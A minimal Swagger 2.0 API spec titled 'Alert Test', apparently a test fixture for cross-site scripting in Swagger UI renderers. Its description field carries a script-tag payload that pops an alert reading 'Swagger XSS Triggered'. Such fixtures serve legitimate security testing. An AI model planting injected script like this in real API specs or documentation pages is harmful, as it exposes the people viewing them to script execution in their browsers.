swagger: '2.0'
info:
  version: 1.0.0
  title: Alert Test
  description: '<script>alert("Swagger XSS Triggered")</script>'
paths:
  /:
    post:
      responses:
        '200':
          description: OK
